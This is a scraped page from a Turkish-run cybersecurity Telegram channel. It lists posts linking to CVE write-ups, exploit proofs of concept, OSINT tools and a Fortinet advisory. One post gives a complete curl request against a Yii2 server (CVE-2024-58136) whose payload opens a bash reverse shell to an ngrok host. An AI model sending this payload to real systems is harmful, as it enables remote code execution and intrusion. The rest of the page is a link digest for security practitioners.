ch
Feedback
İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

İbrahim BALOĞLU - Siber Güvenlik Paylaşımları

前往频道在 Telegram

Mevcut grup, Siber Güvenlik alanında paylaşımlar yapmak için oluşturulmuştur.

显示更多
1 071
订阅者
+124 小时
+57
+2430
帖子存档
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало iptables -A INPUT -m geoip
C2 Redirectors: Advanced Infrastructure for Modern Red Team Operations * read Отдельно порадовало
iptables -A INPUT -m geoip --src-cc RU,CN -j DROP

Windows Server 2025 dMSA Vulnerability * about * toolZ
Windows Server 2025 dMSA Vulnerability * about * toolZ

CVE-2024–58136 — RCE PoC * Yii2 Framework
curl -k -X POST https://sub.domain.tld/index.php \
  -H "Content-Type: application/json" \
  -d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/x.tcp.xx.ngrok.io/xxxx 0>&1'\''"}}'

CVE-2025-21756: Attack of the Vsock * Linux Kernel Exploitation * read * exploit
CVE-2025-21756: Attack of the Vsock * Linux Kernel Exploitation * read * exploit

F5 BIG-IP * Command Injection in Appliance mode 0x_
F5 BIG-IP * Command Injection in Appliance mode 0x_

#tools #OSINT 1. DPULSE - Tool for complex approach to domain OSINT ]-> https://github.com/OSINT-TECHNOLOGIES/dpulse 2. reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities ]-> https://github.com/six2dez/reconftw

CVE-2025-1094 * RCE SQL Injection in PostgreSQL 14.15 * exploit
CVE-2025-1094 * RCE SQL Injection in PostgreSQL 14.15 * exploit

#WebApp_Security "Burp Suite Cookbook: Web application security made easy with Burp Suite", 2023.

Ну это просто атас )))) CVE-2025-3155 - утечка ключей в ubuntu * Attack scenario

🚨 Critical alert for Fortinet users! A 9.3 CVSS flaw (CVE-2024-48887) in FortiSwitch lets hackers remotely change admin pass
🚨 Critical alert for Fortinet users! A 9.3 CVSS flaw (CVE-2024-48887) in FortiSwitch lets hackers remotely change admin passwords — no login needed. 🔧 Fix it: Upgrade ASAP (7.6.1+, 7.4.5+, 7.2.9+, 7.0.11+, 6.4.15+) ⚡ No exploits yet—but Fortinet bugs have been weaponized before. 👉 Full details: https://thehackernews.com/2025/04/fortinet-urges-fortiswitch-upgrades-to.html

HackerOne disclosed on HackerOne: The /reports/:id.json endpoint... https://hackerone.com/reports/3000510

#exploit 1. CCleaner LPE Vulnerability on macOS https://blog.quarkslab.com/ccleaner_lpe_macos.html 2. CVE-2025-0868: Arbitrary Command Injection in DocsGPT https://github.com/shreyas-malhotra/PoC_CVE-2025-0868 3. CVE-2025-30208: Vite Arbitrary File Read vulnerability https://github.com/jackieya/CVE-2025-30208